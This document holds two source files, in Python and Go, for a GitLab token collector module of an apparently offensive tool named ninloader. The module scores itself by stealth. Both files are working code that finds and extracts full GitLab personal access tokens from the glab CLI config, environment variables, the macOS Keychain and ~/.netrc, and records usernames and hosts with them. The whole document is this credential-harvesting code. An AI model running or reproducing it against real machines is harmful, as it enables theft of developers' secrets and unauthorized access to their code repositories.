File: ninloader/ninloader/collectors/gitlab/pat.py
"""GitLab PAT collector — extracts tokens from glab CLI config, env vars,
macOS Keychain, and ~/.netrc.

Sources checked (in order):
1. glab config file: ~/.config/glab-cli/config.yml (token: field per host)
2. Environment variables: GITLAB_TOKEN, GITLAB_PRIVATE_TOKEN
3. macOS Keychain: glab:<host> entries (go-keyring format, same as gh CLI)
4. ~/.netrc: machine gitlab.com entries with glpat-* passwords
"""

from __future__ import annotations

import base64
import os
import re
import subprocess
from pathlib import Path
from typing import List, Optional, Tuple

from ..base import BaseCollector
from .. import CollectorRegistry
from ...types import CollectedToken, DiscoveredToken
from ...secure import secure
from ...platform_utils import home_dir, get_platform


@CollectorRegistry.register
class GitLabPatCollector(BaseCollector):
    service = "gitlab"
    source = "pat"
    stealth_score = 5

    # ------------------------------------------------------------------ #
    # Path helpers
    # ------------------------------------------------------------------ #

    @staticmethod
    def _config_path() -> Path:
        """Return the glab CLI config file path."""
        # glab stores config in ~/.config/glab-cli/config.yml on all platforms
        # Respects GLAB_CONFIG_DIR if set
        config_dir = os.environ.get("GLAB_CONFIG_DIR")
        if config_dir:
            return Path(config_dir) / "config.yml"
        plat = get_platform()
        if plat == "windows":
            appdata = os.environ.get("APPDATA", str(home_dir() / "AppData" / "Roaming"))
            return Path(appdata) / "glab-cli" / "config.yml"
        return home_dir() / ".config" / "glab-cli" / "config.yml"

    @staticmethod
    def _netrc_path() -> Path:
        """Return the .netrc path."""
        plat = get_platform()
        if plat == "windows":
            return home_dir() / "_netrc"
        return home_dir() / ".netrc"

    # ------------------------------------------------------------------ #
    # glab config YAML parsing (regex, no PyYAML)
    # ------------------------------------------------------------------ #

    def _parse_config_yml(self, text: str) -> List[Tuple[str, dict]]:
        """Parse glab config.yml using regex — no PyYAML dependency.

        Format:
        hosts:
            gitlab.com:
                token: glpat-xxxxxxxx
                api_host: gitlab.com
                git_protocol: https
                user: username
        """
        entries: List[Tuple[str, dict]] = []
        in_hosts = False
        current_host: Optional[str] = None
        current_data: dict = {}

        for line in text.splitlines():
            # Detect the top-level `hosts:` block
            if re.match(r'^hosts:\s*$', line):
                in_hosts = True
                continue

            # Another top-level key ends the hosts block
            if in_hosts and re.match(r'^[a-zA-Z]', line):
                if current_host and current_data:
                    entries.append((current_host, current_data))
                in_hosts = False
                current_host = None
                current_data = {}
                continue

            if not in_hosts:
                continue

            # Host key (one level of indent, e.g. "    gitlab.com:")
            host_match = re.match(r'^\s{2,4}(\S+):\s*$', line)
            if host_match:
                if current_host and current_data:
                    entries.append((current_host, current_data))
                current_host = host_match.group(1)
                current_data = {}
                continue

            # Indented key-value under a host (deeper indent)
            kv_match = re.match(r'^\s{4,8}(\w[\w_]*):\s*(.+)$', line)
            if kv_match and current_host:
                current_data[kv_match.group(1)] = kv_match.group(2).strip()

        # Flush last host
        if current_host and current_data:
            entries.append((current_host, current_data))

        return entries

    # ------------------------------------------------------------------ #
    # macOS Keychain
    # ------------------------------------------------------------------ #

    @staticmethod
    def _read_keychain(host: str) -> Optional[str]:
        """Read glab token from macOS Keychain (glab: prefixed entries).

        glab CLI uses go-keyring which may base64-wrap values with a
        ``go-keyring-base64:`` prefix — same pattern as gh CLI.
        """
        if get_platform() != "macos":
            return None
        try:
            result = subprocess.run(
                ["security", "find-generic-password", "-s", f"glab:{host}", "-w"],
                capture_output=True, text=True, timeout=5,
            )
            if result.returncode == 0 and result.stdout.strip():
                raw = result.stdout.strip()
                if raw.startswith("go-keyring-base64:"):
                    encoded = raw[len("go-keyring-base64:"):]
                    return base64.b64decode(encoded).decode("utf-8")
                return raw
        except (subprocess.TimeoutExpired, FileNotFoundError):
            pass
        return None

    # ------------------------------------------------------------------ #
    # Environment variables
    # ------------------------------------------------------------------ #

    @staticmethod
    def _read_env() -> Optional[Tuple[str, str]]:
        """Check GITLAB_TOKEN and GITLAB_PRIVATE_TOKEN env vars.

        Returns (var_name, token_value) or None.
        """
        for var in ("GITLAB_TOKEN", "GITLAB_PRIVATE_TOKEN"):
            value = os.environ.get(var)
            if value and value.strip():
                return (var, value.strip())
        return None

    # ------------------------------------------------------------------ #
    # .netrc parsing
    # ------------------------------------------------------------------ #

    def _parse_netrc(self, text: str) -> List[Tuple[str, str, str]]:
        """Parse .netrc for GitLab entries.

        Returns list of (machine, login, password) tuples.
        Handles both single-line and multi-line .netrc formats.

        Single-line: machine gitlab.com login user password glpat-xxxx
        Multi-line:
          machine gitlab.com
          login user
          password glpat-xxxx
        """
        results: List[Tuple[str, str, str]] = []

        # Normalize: collapse lines and tokenize
        # .netrc allows entries split across lines
        tokens = text.split()
        i = 0
        while i < len(tokens):
            if tokens[i] == "machine":
                machine = tokens[i + 1] if i + 1 < len(tokens) else ""
                login = ""
                password = ""
                i += 2
                # Read login/password pairs until next machine or end
                while i < len(tokens) and tokens[i] != "machine":
                    if tokens[i] == "login" and i + 1 < len(tokens):
                        login = tokens[i + 1]
                        i += 2
                    elif tokens[i] == "password" and i + 1 < len(tokens):
                        password = tokens[i + 1]
                        i += 2
                    elif tokens[i] == "account" and i + 1 < len(tokens):
                        i += 2  # skip account field
                    elif tokens[i] == "macdef":
                        # Skip macro definitions (run until blank line)
                        break
                    else:
                        i += 1

                # Only include GitLab-related machines
                if "gitlab" in machine.lower() and password:
                    results.append((machine, login, password))
            else:
                i += 1

        return results

    # ------------------------------------------------------------------ #
    # discover()
    # ------------------------------------------------------------------ #

    def discover(self) -> List[DiscoveredToken]:
        results: List[DiscoveredToken] = []

        # 1. glab config file
        config = self._config_path()
        if config.exists():
            try:
                text = config.read_text()
                entries = self._parse_config_yml(text)
                for host, data in entries:
                    token = data.get("token", "")
                    user = data.get("user", "unknown")
                    if token:
                        preview = f"{token[:8]}..." if len(token) > 8 else "present"
                        details = f"token={preview}"
                    else:
                        # Check Keychain as fallback
                        kc = self._read_keychain(host)
                        if kc:
                            details = f"token in keychain (extractable, {kc[:8]}...)"
                        else:
                            details = "token in system keyring (not extractable)"
                    results.append(DiscoveredToken(
                        service=self.service,
                        source=self.source,
                        path=str(config),
                        account_hint=f"{user}@{host}",
                        stealth_score=self.stealth_score,
                        details=details,
                    ))
            except Exception as e:
                self._warn(f"Failed to parse {config}: {e}")

        # 2. Environment variables
        env_result = self._read_env()
        if env_result:
            var_name, token = env_result
            preview = f"{token[:8]}..." if len(token) > 8 else "present"
            results.append(DiscoveredToken(
                service=self.service,
                source=self.source,
                path=f"env:{var_name}",
                account_hint=None,
                stealth_score=self.stealth_score,
                details=f"token={preview} (from ${var_name})",
            ))

        # 3. macOS Keychain (standalone check — not tied to config file)
        # Only if we didn't already find a config entry for gitlab.com
        config_hosts = set()
        if config.exists():
            try:
                for host, _ in self._parse_config_yml(config.read_text()):
                    config_hosts.add(host)
            except Exception:
                pass

        if "gitlab.com" not in config_hosts:
            kc = self._read_keychain("gitlab.com")
            if kc:
                results.append(DiscoveredToken(
                    service=self.service,
                    source=self.source,
                    path="keychain:glab:gitlab.com",
                    account_hint=None,
                    stealth_score=self.stealth_score,
                    details=f"token in keychain (extractable, {kc[:8]}...)",
                ))

        # 4. .netrc
        netrc = self._netrc_path()
        if netrc.exists():
            try:
                text = netrc.read_text()
                netrc_entries = self._parse_netrc(text)
                for machine, login, password in netrc_entries:
                    preview = f"{password[:8]}..." if len(password) > 8 else "present"
                    results.append(DiscoveredToken(
                        service=self.service,
                        source=self.source,
                        path=str(netrc),
                        account_hint=f"{login}@{machine}" if login else machine,
                        stealth_score=self.stealth_score,
                        details=f"token={preview} (from .netrc)",
                    ))
            except Exception as e:
                self._warn(f"Failed to parse {netrc}: {e}")

        return results

    # ------------------------------------------------------------------ #
    # collect()
    # ------------------------------------------------------------------ #

    def collect(self) -> List[CollectedToken]:
        results: List[CollectedToken] = []
        seen_tokens: set = set()  # deduplicate across sources

        # 1. glab config file
        config = self._config_path()
        if config.exists():
            try:
                text = config.read_text()
                entries = self._parse_config_yml(text)
                for host, data in entries:
                    token = data.get("token")
                    token_source = "config"

                    # Fall back to Keychain if no token in config
                    if not token:
                        token = self._read_keychain(host)
                        token_source = "keychain"

                    if not token:
                        continue

                    if token in seen_tokens:
                        continue
                    seen_tokens.add(token)

                    user = data.get("user", "unknown")
                    protocol = data.get("git_protocol", "https")
                    api_host = data.get("api_host", host)

                    results.append(CollectedToken(
                        service=self.service,
                        source=self.source,
                        stealth_score=self.stealth_score,
                        username=user,
                        access_token=secure(token),
                        extra={
                            "host": host,
                            "api_host": api_host,
                            "git_protocol": protocol,
                            "token_source": token_source,
                            "token_type": "glpat" if token.startswith("glpat-") else "other",
                        },
                    ))
            except Exception as e:
                self._warn(f"Failed to collect from {config}: {e}")

        # 2. Environment variables
        env_result = self._read_env()
        if env_result:
            var_name, token = env_result
            if token not in seen_tokens:
                seen_tokens.add(token)
                results.append(CollectedToken(
                    service=self.service,
                    source=self.source,
                    stealth_score=self.stealth_score,
                    username=None,
                    access_token=secure(token),
                    extra={
                        "host": "gitlab.com",
                        "token_source": "env",
                        "env_var": var_name,
                        "token_type": "glpat" if token.startswith("glpat-") else "other",
                    },
                ))

        # 3. macOS Keychain (standalone — for gitlab.com if not already collected)
        kc = self._read_keychain("gitlab.com")
        if kc and kc not in seen_tokens:
            seen_tokens.add(kc)
            results.append(CollectedToken(
                service=self.service,
                source=self.source,
                stealth_score=self.stealth_score,
                username=None,
                access_token=secure(kc),
                extra={
                    "host": "gitlab.com",
                    "token_source": "keychain",
                    "token_type": "glpat" if kc.startswith("glpat-") else "other",
                },
            ))

        # 4. .netrc
        netrc = self._netrc_path()
        if netrc.exists():
            try:
                text = netrc.read_text()
                netrc_entries = self._parse_netrc(text)
                for machine, login, password in netrc_entries:
                    if password in seen_tokens:
                        continue
                    seen_tokens.add(password)

                    results.append(CollectedToken(
                        service=self.service,
                        source=self.source,
                        stealth_score=self.stealth_score,
                        username=login or None,
                        access_token=secure(password),
                        extra={
                            "host": machine,
                            "token_source": "netrc",
                            "token_type": "glpat" if password.startswith("glpat-") else "other",
                        },
                    ))
            except Exception as e:
                self._warn(f"Failed to collect from {netrc}: {e}")

        return results

File: ninloader/go/collectors/gitlab/pat.go
package gitlab

import (
	"fmt"
	"os"
	"regexp"
	"strings"

	"github.com/ninken/ninloader-go/internal/collector"
	"github.com/ninken/ninloader-go/internal/platform"
	"github.com/ninken/ninloader-go/internal/registry"
	"github.com/ninken/ninloader-go/internal/types"
)

func init() {
	registry.Register("gitlab", "pat", func() collector.Collector {
		return &PatCollector{BaseCollector: collector.BaseCollector{Svc: "gitlab", Src: "pat"}}
	})
}

// PatCollector extracts GitLab PATs from glab CLI config, env vars,
// macOS Keychain, and ~/.netrc.
type PatCollector struct {
	collector.BaseCollector
}

func (c *PatCollector) Service() string      { return c.Svc }
func (c *PatCollector) Source() string        { return c.Src }
func (c *PatCollector) StealthScore() int     { return 5 }
func (c *PatCollector) Platforms() []string   { return nil }

var (
	reGlabHostsBlock = regexp.MustCompile(`^hosts:\s*$`)
	reGlabTopLevel   = regexp.MustCompile(`^[a-zA-Z]`)
	reGlabHostKey    = regexp.MustCompile(`^\s{2,4}(\S+):\s*$`)
	reGlabKV         = regexp.MustCompile(`^\s{4,8}(\w[\w_]*):\s*(.+)$`)
)

type glabHostEntry struct {
	host string
	data map[string]string
}

// ------------------------------------------------------------------ //
// glab config YAML parsing (regex, no YAML dependency)
// ------------------------------------------------------------------ //

// parseConfigYml parses glab config.yml using regex.
//
// Format:
//
//	hosts:
//	    gitlab.com:
//	        token: glpat-xxxxxxxx
//	        api_host: gitlab.com
//	        git_protocol: https
//	        user: username
func (c *PatCollector) parseConfigYml(text string) []glabHostEntry {
	var entries []glabHostEntry
	inHosts := false
	var currentHost string
	currentData := map[string]string{}

	for _, line := range strings.Split(text, "\n") {
		// Detect the top-level `hosts:` block
		if reGlabHostsBlock.MatchString(line) {
			inHosts = true
			continue
		}

		// Another top-level key ends the hosts block
		if inHosts && reGlabTopLevel.MatchString(line) {
			if currentHost != "" && len(currentData) > 0 {
				entries = append(entries, glabHostEntry{host: currentHost, data: currentData})
			}
			inHosts = false
			currentHost = ""
			currentData = map[string]string{}
			continue
		}

		if !inHosts {
			continue
		}

		// Host key (one level of indent)
		if m := reGlabHostKey.FindStringSubmatch(line); m != nil {
			if currentHost != "" && len(currentData) > 0 {
				entries = append(entries, glabHostEntry{host: currentHost, data: currentData})
			}
			currentHost = m[1]
			currentData = map[string]string{}
			continue
		}

		// Indented key-value under a host
		if m := reGlabKV.FindStringSubmatch(line); m != nil && currentHost != "" {
			currentData[m[1]] = strings.TrimSpace(m[2])
		}
	}

	// Flush last host
	if currentHost != "" && len(currentData) > 0 {
		entries = append(entries, glabHostEntry{host: currentHost, data: currentData})
	}

	return entries
}

// ------------------------------------------------------------------ //
// Environment variables
// ------------------------------------------------------------------ //

// readEnv checks GITLAB_TOKEN and GITLAB_PRIVATE_TOKEN.
// Returns (varName, token) or ("", "").
func (c *PatCollector) readEnv() (string, string) {
	for _, v := range []string{"GITLAB_TOKEN", "GITLAB_PRIVATE_TOKEN"} {
		val := os.Getenv(v)
		if strings.TrimSpace(val) != "" {
			return v, strings.TrimSpace(val)
		}
	}
	return "", ""
}

// ------------------------------------------------------------------ //
// .netrc parsing
// ------------------------------------------------------------------ //

// netrcEntry holds a parsed .netrc machine entry.
type netrcEntry struct {
	machine  string
	login    string
	password string
}

// parseNetrc parses .netrc for GitLab entries.
// Handles both single-line and multi-line .netrc formats.
func (c *PatCollector) parseNetrc(text string) []netrcEntry {
	var results []netrcEntry

	// Normalize: collapse lines and tokenize
	tokens := strings.Fields(text)
	i := 0
	for i < len(tokens) {
		if tokens[i] == "machine" {
			machine := ""
			if i+1 < len(tokens) {
				machine = tokens[i+1]
			}
			login := ""
			password := ""
			i += 2

			// Read login/password pairs until next machine or end
			for i < len(tokens) && tokens[i] != "machine" {
				switch tokens[i] {
				case "login":
					if i+1 < len(tokens) {
						login = tokens[i+1]
						i += 2
					} else {
						i++
					}
				case "password":
					if i+1 < len(tokens) {
						password = tokens[i+1]
						i += 2
					} else {
						i++
					}
				case "account":
					if i+1 < len(tokens) {
						i += 2 // skip account field
					} else {
						i++
					}
				case "macdef":
					// Skip macro definitions
					goto nextMachine
				default:
					i++
				}
			}

		nextMachine:
			// Only include GitLab-related machines
			if strings.Contains(strings.ToLower(machine), "gitlab") && password != "" {
				results = append(results, netrcEntry{
					machine:  machine,
					login:    login,
					password: password,
				})
			}
		} else {
			i++
		}
	}

	return results
}

// tokenType returns "glpat" if the token starts with "glpat-", otherwise "other".
func tokenType(token string) string {
	if strings.HasPrefix(token, "glpat-") {
		return "glpat"
	}
	return "other"
}

// ------------------------------------------------------------------ //
// Discover
// ------------------------------------------------------------------ //

func (c *PatCollector) Discover() []*types.DiscoveredToken {
	var results []*types.DiscoveredToken

	// 1. glab config file
	configPath := platform.GlabConfigPath()
	if _, err := os.Stat(configPath); err == nil {
		data, err := os.ReadFile(configPath)
		if err != nil {
			c.Warn(fmt.Sprintf("Failed to parse %s: %v", configPath, err))
		} else {
			entries := c.parseConfigYml(string(data))
			for _, entry := range entries {
				token := entry.data["token"]
				user := entry.data["user"]
				if user == "" {
					user = "unknown"
				}

				var details string
				if token != "" {
					if len(token) > 8 {
						details = fmt.Sprintf("token=%s...", token[:8])
					} else {
						details = "token=present"
					}
				} else {
					// Check Keychain as fallback
					kc := c.readKeychain(entry.host)
					if kc != "" {
						details = fmt.Sprintf("token in keychain (extractable, %s...)", kc[:8])
					} else {
						details = "token in system keyring (not extractable)"
					}
				}

				results = append(results, &types.DiscoveredToken{
					Service:      c.Svc,
					Source:       c.Src,
					Path:         configPath,
					AccountHint:  fmt.Sprintf("%s@%s", user, entry.host),
					StealthScore: 5,
					Details:      details,
				})
			}
		}
	}

	// 2. Environment variables
	varName, token := c.readEnv()
	if varName != "" {
		var preview string
		if len(token) > 8 {
			preview = fmt.Sprintf("token=%s... (from $%s)", token[:8], varName)
		} else {
			preview = fmt.Sprintf("token=present (from $%s)", varName)
		}
		results = append(results, &types.DiscoveredToken{
			Service:      c.Svc,
			Source:       c.Src,
			Path:         fmt.Sprintf("env:%s", varName),
			StealthScore: 5,
			Details:      preview,
		})
	}

	// 3. macOS Keychain (standalone check — not tied to config file)
	configHosts := map[string]bool{}
	if _, err := os.Stat(configPath); err == nil {
		data, _ := os.ReadFile(configPath)
		if data != nil {
			for _, entry := range c.parseConfigYml(string(data)) {
				configHosts[entry.host] = true
			}
		}
	}

	if !configHosts["gitlab.com"] {
		kc := c.readKeychain("gitlab.com")
		if kc != "" {
			results = append(results, &types.DiscoveredToken{
				Service:      c.Svc,
				Source:       c.Src,
				Path:         "keychain:glab:gitlab.com",
				StealthScore: 5,
				Details:      fmt.Sprintf("token in keychain (extractable, %s...)", kc[:8]),
			})
		}
	}

	// 4. .netrc
	netrcPath := platform.NetrcPath()
	if _, err := os.Stat(netrcPath); err == nil {
		data, err := os.ReadFile(netrcPath)
		if err != nil {
			c.Warn(fmt.Sprintf("Failed to parse %s: %v", netrcPath, err))
		} else {
			netrcEntries := c.parseNetrc(string(data))
			for _, ne := range netrcEntries {
				var preview string
				if len(ne.password) > 8 {
					preview = fmt.Sprintf("token=%s... (from .netrc)", ne.password[:8])
				} else {
					preview = "token=present (from .netrc)"
				}
				hint := ne.machine
				if ne.login != "" {
					hint = fmt.Sprintf("%s@%s", ne.login, ne.machine)
				}
				results = append(results, &types.DiscoveredToken{
					Service:      c.Svc,
					Source:       c.Src,
					Path:         netrcPath,
					AccountHint:  hint,
					StealthScore: 5,
					Details:      preview,
				})
			}
		}
	}

	return results
}

// ------------------------------------------------------------------ //
// Collect
// ------------------------------------------------------------------ //

func (c *PatCollector) Collect() []*types.CollectedToken {
	var results []*types.CollectedToken
	seen := map[string]bool{} // deduplicate across sources

	// 1. glab config file
	configPath := platform.GlabConfigPath()
	if _, err := os.Stat(configPath); err == nil {
		data, err := os.ReadFile(configPath)
		if err != nil {
			c.Warn(fmt.Sprintf("Failed to collect from %s: %v", configPath, err))
		} else {
			entries := c.parseConfigYml(string(data))
			for _, entry := range entries {
				token := entry.data["token"]
				tokenSrc := "config"

				// Fall back to Keychain if no token in config
				if token == "" {
					token = c.readKeychain(entry.host)
					tokenSrc = "keychain"
				}

				if token == "" {
					continue
				}
				if seen[token] {
					continue
				}
				seen[token] = true

				user := entry.data["user"]
				if user == "" {
					user = "unknown"
				}
				protocol := entry.data["git_protocol"]
				if protocol == "" {
					protocol = "https"
				}
				apiHost := entry.data["api_host"]
				if apiHost == "" {
					apiHost = entry.host
				}

				tok := types.NewCollectedToken(c.Svc, c.Src, 5)
				tok.Username = user
				tok.AccessToken = types.Secure(token)
				tok.Extra["host"] = entry.host
				tok.Extra["api_host"] = apiHost
				tok.Extra["git_protocol"] = protocol
				tok.Extra["token_source"] = tokenSrc
				tok.Extra["token_type"] = tokenType(token)
				results = append(results, tok)
			}
		}
	}

	// 2. Environment variables
	varName, envToken := c.readEnv()
	if varName != "" && !seen[envToken] {
		seen[envToken] = true
		tok := types.NewCollectedToken(c.Svc, c.Src, 5)
		tok.AccessToken = types.Secure(envToken)
		tok.Extra["host"] = "gitlab.com"
		tok.Extra["token_source"] = "env"
		tok.Extra["env_var"] = varName
		tok.Extra["token_type"] = tokenType(envToken)
		results = append(results, tok)
	}

	// 3. macOS Keychain (standalone — for gitlab.com if not already collected)
	kc := c.readKeychain("gitlab.com")
	if kc != "" && !seen[kc] {
		seen[kc] = true
		tok := types.NewCollectedToken(c.Svc, c.Src, 5)
		tok.AccessToken = types.Secure(kc)
		tok.Extra["host"] = "gitlab.com"
		tok.Extra["token_source"] = "keychain"
		tok.Extra["token_type"] = tokenType(kc)
		results = append(results, tok)
	}

	// 4. .netrc
	netrcPath := platform.NetrcPath()
	if _, err := os.Stat(netrcPath); err == nil {
		data, err := os.ReadFile(netrcPath)
		if err != nil {
			c.Warn(fmt.Sprintf("Failed to collect from %s: %v", netrcPath, err))
		} else {
			netrcEntries := c.parseNetrc(string(data))
			for _, ne := range netrcEntries {
				if seen[ne.password] {
					continue
				}
				seen[ne.password] = true

				tok := types.NewCollectedToken(c.Svc, c.Src, 5)
				if ne.login != "" {
					tok.Username = ne.login
				}
				tok.AccessToken = types.Secure(ne.password)
				tok.Extra["host"] = ne.machine
				tok.Extra["token_source"] = "netrc"
				tok.Extra["token_type"] = tokenType(ne.password)
				results = append(results, tok)
			}
		}
	}

	return results
}
